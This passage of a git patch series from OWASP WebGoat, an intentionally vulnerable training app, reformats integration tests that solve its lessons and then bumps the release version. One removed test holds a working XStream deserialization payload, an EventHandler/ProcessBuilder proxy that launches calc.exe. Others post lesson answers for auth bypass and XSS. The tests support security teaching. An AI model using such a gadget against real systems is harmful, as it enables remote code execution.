-    	String solution = "<contact class='dynamic-proxy'>\n" + 
-    			"<interface>org.owasp.webgoat.lessons.vulnerablecomponents.Contact</interface>\n" +
-    			"  <handler class='java.beans.EventHandler'>\n" + 
-    			"    <target class='java.lang.ProcessBuilder'>\n" + 
-    			"      <command>\n" + 
-    			"        <string>calc.exe</string>\n" + 
-    			"      </command>\n" + 
-    			"    </target>\n" + 
-    			"    <action>start</action>\n" + 
-    			"  </handler>\n" + 
-    			"</contact>";
-    	startLesson("VulnerableComponents");
-        Map<String, Object> params = new HashMap<>();
-        params.clear();
-        params.put("payload", solution);
-        checkAssignment(url("/WebGoat/VulnerableComponents/attack1"), params, true);
-        checkResults("/VulnerableComponents/");
-    }
-    
-    @Test
-    public void insecureLogin() {
-    	startLesson("InsecureLogin");
-        Map<String, Object> params = new HashMap<>();
-        params.clear();
-        params.put("username", "CaptainJack");
-        params.put("password", "BlackPearl");
-        checkAssignment(url("/WebGoat/InsecureLogin/task"), params, true);
-        checkResults("/InsecureLogin/");
-    }
+    startLesson("HttpProxies");
+    MatcherAssert.assertThat(
+        RestAssured.given()
+            .when()
+            .relaxedHTTPSValidation()
+            .cookie("JSESSIONID", getWebGoatCookie())
+            .header("x-request-intercepted", "true")
+            .contentType(ContentType.JSON)
+            .get(
+                url("/WebGoat/HttpProxies/intercept-request?changeMe=Requests are tampered easily"))
+            .then()
+            .statusCode(200)
+            .extract()
+            .path("lessonCompleted"),
+        CoreMatchers.is(true));
+    checkResults("/HttpProxies/");
+  }
 
-    @Test
-    public void securePasswords() {
-        startLesson("SecurePasswords");
-        Map<String, Object> params = new HashMap<>();
-        params.clear();
-        params.put("password", "ajnaeliclm^&&@kjn.");
-        checkAssignment(url("/WebGoat/SecurePasswords/assignment"), params, true);
-        checkResults("SecurePasswords/");
+  @Test
+  public void chrome() {
+    startLesson("ChromeDevTools");
 
-        startLesson("AuthBypass");
-        params.clear();
-        params.put("secQuestion2", "John");
-        params.put("secQuestion3", "Main");
-        params.put("jsEnabled", "1");
-        params.put("verifyMethod", "SEC_QUESTIONS");
-        params.put("userId", "12309746");
-        checkAssignment(url("/WebGoat/auth-bypass/verify-account"), params, true);
-        checkResults("/auth-bypass/");
+    Map<String, Object> params = new HashMap<>();
+    params.clear();
+    params.put("param1", "42");
+    params.put("param2", "24");
 
-        startLesson("HttpProxies");
-        MatcherAssert.assertThat(RestAssured.given().when().relaxedHTTPSValidation().cookie("JSESSIONID", getWebGoatCookie()).header("x-request-intercepted", "true")
-                .contentType(ContentType.JSON)
-                .get(url("/WebGoat/HttpProxies/intercept-request?changeMe=Requests are tampered easily")).then()
-                .statusCode(200).extract().path("lessonCompleted"), CoreMatchers.is(true));
-        checkResults("/HttpProxies/");
-    }
+    String result =
+        RestAssured.given()
+            .when()
+            .relaxedHTTPSValidation()
+            .cookie("JSESSIONID", getWebGoatCookie())
+            .header("webgoat-requested-by", "dom-xss-vuln")
+            .header("X-Requested-With", "XMLHttpRequest")
+            .formParams(params)
+            .post(url("/WebGoat/CrossSiteScripting/phone-home-xss"))
+            .then()
+            .statusCode(200)
+            .extract()
+            .path("output");
+    String secretNumber = result.substring("phoneHome Response is ".length());
 
-    @Test
-    public void chrome() {
-        startLesson("ChromeDevTools");
+    params.clear();
+    params.put("successMessage", secretNumber);
+    checkAssignment(url("/WebGoat/ChromeDevTools/dummy"), params, true);
 
-        Map<String, Object> params = new HashMap<>();
-        params.clear();
-        params.put("param1", "42");
-        params.put("param2", "24");
+    params.clear();
+    params.put("number", "24");
+    params.put("network_num", "24");
+    checkAssignment(url("/WebGoat/ChromeDevTools/network"), params, true);
 
-        String result =
-                RestAssured.given()
-                        .when()
-                        .relaxedHTTPSValidation()
-                        .cookie("JSESSIONID", getWebGoatCookie())
-                        .header("webgoat-requested-by", "dom-xss-vuln")
-                        .header("X-Requested-With", "XMLHttpRequest")
-                        .formParams(params)
-                        .post(url("/WebGoat/CrossSiteScripting/phone-home-xss"))
-                        .then()
-                        .statusCode(200)
-                        .extract().path("output");
-        String secretNumber = result.substring("phoneHome Response is ".length());
+    checkResults("/ChromeDevTools/");
+  }
 
-        params.clear();
-        params.put("successMessage", secretNumber);
-        checkAssignment(url("/WebGoat/ChromeDevTools/dummy"), params, true);
+  @Test
+  public void authByPass() {
+    startLesson("AuthBypass");
+    Map<String, Object> params = new HashMap<>();
+    params.clear();
+    params.put("secQuestion2", "John");
+    params.put("secQuestion3", "Main");
+    params.put("jsEnabled", "1");
+    params.put("verifyMethod", "SEC_QUESTIONS");
+    params.put("userId", "12309746");
+    checkAssignment(url("/auth-bypass/verify-account"), params, true);
+    checkResults("/auth-bypass/");
+  }
 
-        params.clear();
-        params.put("number", "24");
-        params.put("network_num", "24");
-        checkAssignment(url("/WebGoat/ChromeDevTools/network"), params, true);
-
-        checkResults("/ChromeDevTools/");
-    }
-    
-    @Test
-    public void authByPass() {
-        startLesson("AuthBypass");
-        Map<String, Object> params = new HashMap<>();
-        params.clear();
-        params.put("secQuestion2", "John");
-        params.put("secQuestion3", "Main");
-        params.put("jsEnabled", "1");
-        params.put("verifyMethod", "SEC_QUESTIONS");
-        params.put("userId", "12309746");
-        checkAssignment(url("/auth-bypass/verify-account"), params, true);
-        checkResults("/auth-bypass/");
-
-    }
-    
-    @Test
-    public void lessonTemplate() {
-    	startLesson("LessonTemplate");
-    	Map<String, Object> params = new HashMap<>();
-        params.clear();
-        params.put("param1", "secr37Value");
-        params.put("param2", "Main");
-        checkAssignment(url("/lesson-template/sample-attack"), params, true);
-        checkResults("/lesson-template/");
-    	
-    }
-    
+  @Test
+  public void lessonTemplate() {
+    startLesson("LessonTemplate");
+    Map<String, Object> params = new HashMap<>();
+    params.clear();
+    params.put("param1", "secr37Value");
+    params.put("param2", "Main");
+    checkAssignment(url("/lesson-template/sample-attack"), params, true);
+    checkResults("/lesson-template/");
+  }
 }

From 716a7dd9eadfc1a3a67e90880534c02a15b84325 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Thu, 5 Jan 2023 20:51:34 +0100
Subject: [PATCH 227/227] Preparing release 2023.0

---
 README.md        | 4 ++--
 RELEASE_NOTES.md | 4 ++--
 pom.xml          | 2 +-
 3 files changed, 5 insertions(+), 5 deletions(-)

diff --git a/README.md b/README.md
index 6fb57e261..44f30e7e5 100644
--- a/README.md
+++ b/README.md
@@ -62,7 +62,7 @@ This way, you can start where you left off. If you remove the container, you nee
 Download the latest WebGoat release from [https://github.com/WebGoat/WebGoat/releases](https://github.com/WebGoat/WebGoat/releases)
 
 ```shell
-java -Dfile.encoding=UTF-8 -Dwebgoat.port=8080 -Dwebwolf.port=9090 -jar webgoat-2023.1.jar
+java -Dfile.encoding=UTF-8 -Dwebgoat.port=8080 -Dwebwolf.port=9090 -jar webgoat-2023.0.jar
 ```
 
 Click the link in the log to start WebGoat.
@@ -125,7 +125,7 @@ For instance running as a jar on a Linux/macOS it will look like this:
 ```Shell
 export EXCLUDE_CATEGORIES="CLIENT_SIDE,GENERAL,CHALLENGE"
 export EXCLUDE_LESSONS="SqlInjectionAdvanced,SqlInjectionMitigations"
-java -jar target/webgoat-2023.1-SNAPSHOT.jar
+java -jar target/webgoat-2023.0-SNAPSHOT.jar
 ```
 
 Or in a docker run it would (once this version is pushed into docker hub) look like this:
diff --git a/RELEASE_NOTES.md b/RELEASE_NOTES.md
index 0c7b44d33..b0da20ea7 100644
--- a/RELEASE_NOTES.md
+++ b/RELEASE_NOTES.md
@@ -1,8 +1,8 @@
 # WebGoat release notes
 
-## Version 2023.1
+## Version 2023.0
 
-With great pleasure, we present you with a new release of WebGoat **2023.1**. Finally, it has been a while. This year starts with a new release of WebGoat. This year we will undoubtedly release more often. From this release on, we began to use a new versioning scheme (https://calver.org/#scheme).
+With great pleasure, we present you with a new release of WebGoat **2023.0**. Finally, it has been a while. This year starts with a new release of WebGoat. This year we will undoubtedly release more often. From this release on, we began to use a new versioning scheme (https://calver.org/#scheme).
 
 A big thanks to René Zubcevic and Àngel Ollé Blázquez for keeping the project alive this last year, and hopefully, we can make
 many more releases this year.
diff --git a/pom.xml b/pom.xml
index 056b987c5..4e2ab4ccd 100644
--- a/pom.xml
+++ b/pom.xml
@@ -10,7 +10,7 @@
   </parent>
   <groupId>org.owasp.webgoat</groupId>
   <artifactId>webgoat</artifactId>
-  <version>2023.1</version>
+  <version>2023.0</version>
   <packaging>jar</packaging>
 
   <name>WebGoat</name>